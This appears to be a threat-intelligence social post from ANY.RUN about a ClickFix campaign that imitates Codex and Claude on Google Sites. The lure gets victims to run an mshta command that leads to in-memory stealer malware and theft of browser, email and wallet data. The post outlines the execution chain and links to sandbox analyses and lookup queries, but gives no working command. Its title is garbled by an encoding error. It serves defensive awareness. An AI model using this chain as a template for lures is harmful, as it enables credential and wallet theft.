๐๐ฎ๐ธ๐ฒ ๐๐น๐ฎ๐๐ฑ๐ฒ & ๐๐ผ๐ฑ๐ฒ๐
๐๐ฒ๐น๐ถ๐๐ฒ๐ฟ ๐๐ป-๐ ๐ฒ๐บ๐ผ๐ฟ๐ ๐ฆ๐๐ฒ๐ฎ๐น๐ฒ๐ฟ: ๐๐น๐ถ๐ฐ๐ธ๐๐ถ๐
๐๐ถ๐ฎ ๐๐ผ๐ผ๐ด๐น๐ฒ ๐ฆ๐ถ๐๐ฒ๐๏ธ Weโre tracking a #ClickFix campaign that mimics popular AI tools, including Codex and Claude, and abuses trusted Google Sites infrastructure to deliver stealer #malware.With no standalone executable dropped to disk and network activity appearing as legitimate powershell.exe traffic, the attack can significantly reduce visibility during the early stages of compromise.๏ธ Victims are directed to trusted sites[.]google[.]com pages and instructed to execute an mshta command. The attack results in in-memory stealer execution, theft of browser, email, and cryptocurrency wallet data, and outbound communication with attacker-controlled C2 infrastructure, while leaving fewer traditional detection opportunities for SOC teams.Execution chain: Trusted Google Sites lure ๏ธ User-executed mshta command ๏ธ Multi-stage PowerShell delivery ๏ธ Steganographic payload extraction from image ๏ธ Shellcode deployment ๏ธ In-memory execution inside powershell.exe ๏ธ Browser, email & wallet data theft ๏ธ C2 exfiltration Using #ANYRUN Sandbox, investigate the full ClickFix execution chain, validate detection coverage, and observe PowerShell staging, steganographic payload delivery, and credential theft activity. Explore the analysis sessions and collect IOCs: Codex lure: https://app.any.run/tasks/151cfb30-5ef2-4962-a90e-58a59ecc43da/?utm_source=mastodon&utm_medium=post&utm_campaign=claude_codex_clickfix&utm_term=030626&utm_content=linktoservice Claude lure: https://app.any.run/tasks/698e0bd5-01b6-40fe-814c-5c0885cea645/?utm_source=mastodon&utm_medium=post&utm_campaign=claude_codex_clickfix&utm_term=030626&utm_content=linktoservice Track related ClickFix activity in #ANYRUN TI Lookup, identify additional Codex and Claude lures, and uncover related AI-themed ClickFix activity and infrastructure: https://intelligence.any.run/analysis/lookup?utm_source=mastodon&utm_medium=post&utm_campaign=claude_codex_clickfix&utm_content=030626&utm_term=linktotilookup#%7B%2522query%2522:%2522url:%255C%2522https:/sites.google.com/*/cdx%255C%2522%2520or%2520url:%255C%2522https:/sites.google.com/*/clau%255C%2522%2522,%2522dateRange%2522:7%7D https://intelligence.any.run/analysis/lookup?utm_source=mastodon&utm_medium=post&utm_campaign=claude_codex_clickfix&utm_content=030626&utm_term=linktotilookup#%7B%22query%22:%22ruleName:%5C%22AI-themed%20ClickFix%20phishing%20page%20has%20been%20detected%5C%22%22,%22dateRange%22:14%7D Equip your SOC with stronger phishing detection and contain incidents faster: https://any.run/enterprise/?utm_source=mastodon&utm_medium=post&utm_campaign=claude_codex_clickfix&utm_term=030626&utm_content=linktoenterprise#cybersecurity #infosec